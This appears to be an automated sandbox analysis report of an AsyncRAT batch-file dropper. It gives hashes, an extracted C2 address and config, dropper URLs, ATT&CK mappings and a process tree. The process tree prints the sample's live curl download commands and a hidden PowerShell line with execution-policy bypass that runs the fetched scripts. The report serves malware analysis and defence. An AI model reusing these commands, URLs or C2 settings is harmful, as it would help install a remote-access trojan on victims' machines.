asyncrat | 21d7310605e581dbcd8a1c485e6587969c4220cc34962f632735facee89f356d

General

Target

YENB0G9CNCEL.bat
Size

1KB
MD5

0850bed86b58f6cc688a9bdc572cbb09
SHA1

4231a90ab16aa0486d28a07797977154c0407db6
SHA256

21d7310605e581dbcd8a1c485e6587969c4220cc34962f632735facee89f356d
SHA512

75c7cc7977e4e641b02c7dea16dd4b0d11d1b867401cd11900d38b62698d3614125576d6ba1156d8e4843b19d081ce7399f9aa6e3539bf7f2692727d43d1578d

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_2b3e0aa5-ea4c-4b6c-b4fb-ffd97f55a523/ba8ee9ec-b88f-4790-9a20-15398c1906da/e12f0f2d-542f-4d56-ab33-6696336c0e9c?temp_url_sig=f59339ce78a96139157b21132687d93c516b7e0dff5892c1129220cdce51dcb2&temp_url_expires=1722978000811&filename=AE.exe

exe.dropper

https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_2b3e0aa5-ea4c-4b6c-b4fb-ffd97f55a523/719ce3c5-8399-415d-82c3-ba4c5ebae040/451e981f-3416-484b-ba8a-6c3aae1417f9?temp_url_sig=556153ec968ac29ad231ea6c322f68ca67bb5cdcaac01d58e5fbd2c716a5edd8&temp_url_expires=1722977955443&filename=Client.exe

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

185.169.54.165:7331

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
37	208	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
208	powershell.exe

Downloads MZ/PE file

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 208 set thread context of 4876	208	powershell.exe	95
PID 208 set thread context of 2320	208	powershell.exe	99

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
208	powershell.exe
208	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	4876	RegAsm.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 1748 wrote to memory of 1700	1748	cmd.exe	85
PID 1748 wrote to memory of 1700	1748	cmd.exe	85
PID 1748 wrote to memory of 3988	1748	cmd.exe	89
PID 1748 wrote to memory of 3988	1748	cmd.exe	89
PID 1748 wrote to memory of 208	1748	cmd.exe	90
PID 1748 wrote to memory of 208	1748	cmd.exe	90
PID 208 wrote to memory of 1140	208	powershell.exe	91
PID 208 wrote to memory of 1140	208	powershell.exe	91
PID 1140 wrote to memory of 1532	1140	csc.exe	94
PID 1140 wrote to memory of 1532	1140	csc.exe	94
PID 208 wrote to memory of 4876	208	powershell.exe	95
PID 208 wrote to memory of 4876	208	powershell.exe	95
PID 208 wrote to memory of 4876	208	powershell.exe	95
PID 208 wrote to memory of 4876	208	powershell.exe	95
PID 208 wrote to memory of 4876	208	powershell.exe	95
PID 208 wrote to memory of 4876	208	powershell.exe	95
PID 208 wrote to memory of 4876	208	powershell.exe	95
PID 208 wrote to memory of 4876	208	powershell.exe	95
PID 208 wrote to memory of 2320	208	powershell.exe	99
PID 208 wrote to memory of 2320	208	powershell.exe	99
PID 208 wrote to memory of 2320	208	powershell.exe	99
PID 208 wrote to memory of 2320	208	powershell.exe	99
PID 208 wrote to memory of 2320	208	powershell.exe	99
PID 208 wrote to memory of 2320	208	powershell.exe	99
PID 208 wrote to memory of 2320	208	powershell.exe	99
PID 208 wrote to memory of 2320	208	powershell.exe	99

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YENB0G9CNCEL.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1748
- C:\Windows\system32\curl.exe
  curl --silent -o "C:\Users\Admin\Downloads\yenisc.ps1" "https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_2b3e0aa5-ea4c-4b6c-b4fb-ffd97f55a523/b496ff8d-f746-436f-9f51-f0f5e9a54c72/c9964749-ce1b-4755-bdf4-1baeace3f824?temp_url_sig=309db29aa8525a320e6e31b7be5c56c9ddfc1ce17173e0f6ce668675f2e8239f&temp_url_expires=1722978047256&filename=gBCncelbypass.ps1"
  2⤵
  PID:1700
- C:\Windows\system32\curl.exe
  curl --silent -o "C:\Users\Admin\Downloads\yenisc2.ps1" "https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_2b3e0aa5-ea4c-4b6c-b4fb-ffd97f55a523/b496ff8d-f746-436f-9f51-f0f5e9a54c72/80eb5218-4192-45e1-9974-d46407fc1475?temp_url_sig=d9d4b8fce07cbf5e93d6e2ce6a634b2e74f0697b1a7fc4ff90f5016fbe6e090e&temp_url_expires=1722978046557&filename=stub.ps1"
  2⤵
  PID:3988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -Command "& 'C:\Users\Admin\Downloads\yenisc.ps1'; & 'C:\Users\Admin\Downloads\yenisc2.ps1'; Start-Sleep -Seconds 6; & 'C:\Users\Admin\Downloads\yenisc.ps1'; & 'C:\Users\Admin\Downloads\yenisc2.ps1'"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:208
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\koricveo\koricveo.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1140
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC7C4.tmp" "c:\Users\Admin\AppData\Local\Temp\koricveo\CSC1CFB66E7C9F44DAE809065B2E158B16D.TMP"
      4⤵
      PID:1532
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4876
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESC7C4.tmp

Filesize
1KB

MD5
b00be012a3bfb3687c2ca4ef82b56061

SHA1
025e2d5ecfb3ab60dddd39f3092716da07ee904a

SHA256
24ca64dc7c662671682300b1a81a96a05192f0253c8fb6c698914071127495a0

SHA512
e572ec45a74bfe7a64407316d9171b2753d83e8beb9d75a564148a8753679f5d9592046b83efe8a91ada8c642a4e5fb891d5ccaabfaf8c4e60cb5569b112247e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3eu4b1nz.x0m.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\koricveo\koricveo.dll

Filesize
8KB

MD5
80b513e7fb3e1b141622391805be963f

SHA1
37b02554c9b39f3652bec68d6d77da4a6d1b6020

SHA256
746ce379dfbca25945d98d88ac896dfc5e790022492d748fd5a0e64afac63bc8

SHA512
4ac30bcb059a1a4e9089688f815728b8223197470081ce35f5508c3f15c121208819b8e9cb00d8a5c5cebeb8ee9d2ec2f09d099589f376dce8e090f9ebc4bb78

Download Submit
C:\Users\Admin\Downloads\yenisc.ps1

Filesize
11KB

MD5
1aeb09dfea797e31fb06087d48e87cc8

SHA1
ffc83b868ea7e57c86053c823c3a0c17b7f81479

SHA256
77842b05bf2ff23d3cb8ebb019f7d40310280c65816f78f655b011162a67dd85

SHA512
4181c8d4ce6e5fd9f433d42318fce462e376662ed792281b4b8bcfada7a3d6dc000afbc26e7b3450fb36d3e8c4d0707192e42451c37a9854ad8ffa32a37c3cd7

Download Submit
C:\Users\Admin\Downloads\yenisc2.ps1

Filesize
2KB

MD5
b4ce78d3ce06757ceac96f41e3d063b6

SHA1
8be4093f5effe6df2734b5db044fec34bddaa2fb

SHA256
344c7da93f656041139c2025a960539db8916f2ab80dc780ef6eefab359fed04

SHA512
6933c30575451de6b36d38befe85a4e5fb6612073a1a16605f43b6a9bcad6e1a5cabd113a59950e3bf93c427edef1c7139cec2665ad9cecb9fe660b5a8b5c757

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\koricveo\CSC1CFB66E7C9F44DAE809065B2E158B16D.TMP

Filesize
652B

MD5
4386f8ec1c5c85dc3827ed10d57a30a9

SHA1
5d5179c0d10f11bf3549c1343380cae64d5dbd61

SHA256
c597f4e02365d17ecef85877c5c4e290e11a7d45450e208b20d8f9fc824f439c

SHA512
de1d7581db21ef551c592234ab25fb4219bf96bb956550435d0cb17e0d6f9d9812d16a0aa4e9c66d2c4dc2462f96597c1975eb702cd0fa02ffef9d2c69e4e9e6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\koricveo\koricveo.0.cs

Filesize
11KB

MD5
663338909086aed18110382d73ff9594

SHA1
25685ec0deef7d8170c98c65dbe937ed9181115f

SHA256
4ad28ba4ff78fce289b3dc6fbba82f8a98302725f3a75531a7647c2548cec447

SHA512
9d861659219c9b162d2669417236e103b4dccb1f1ed48d8415f00b3fdcc972617ab775154cab1061b58148485fa8ba98c2d0a1b79e1bcf88c0f0e2554af3a1f3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\koricveo\koricveo.cmdline

Filesize
369B

MD5
56d31f46db4bf5c97e7beaee137da439

SHA1
059c6917e4c7f17854837b98ff612f4a06921aa2

SHA256
01517a58024e056c3aebde4afe6803fe47898376f5789516129f6d2e515ac3e2

SHA512
4f61cc0a781cac5987adfc2e0dac7e140e0c91c4f31b24d38efa0fafc119ce8fd6f8cf62ece774b443bfda4f76cbbc3deff9ad245acdf881c08a9df7accfbb49

Download Submit
memory/208-28-0x0000015BA6890000-0x0000015BA6898000-memory.dmp

Filesize
32KB

Download
memory/208-14-0x00007FF8D3A50000-0x00007FF8D4511000-memory.dmp

Filesize
10.8MB

Download
memory/208-2-0x00007FF8D3A53000-0x00007FF8D3A55000-memory.dmp

Filesize
8KB

Download
memory/208-13-0x00007FF8D3A50000-0x00007FF8D4511000-memory.dmp

Filesize
10.8MB

Download
memory/208-12-0x0000015BA68B0000-0x0000015BA68D2000-memory.dmp

Filesize
136KB

Download
memory/208-31-0x0000015BA8F10000-0x0000015BA8F50000-memory.dmp

Filesize
256KB

Download
memory/208-32-0x0000015BA8EE0000-0x0000015BA8EE6000-memory.dmp

Filesize
24KB

Download
memory/208-42-0x00007FF8D3A50000-0x00007FF8D4511000-memory.dmp

Filesize
10.8MB

Download
memory/4876-33-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4876-36-0x0000000005DD0000-0x0000000005E6C000-memory.dmp

Filesize
624KB

Download
memory/4876-37-0x0000000006420000-0x00000000069C4000-memory.dmp

Filesize
5.6MB

Download
memory/4876-38-0x0000000005EE0000-0x0000000005F46000-memory.dmp

Filesize
408KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads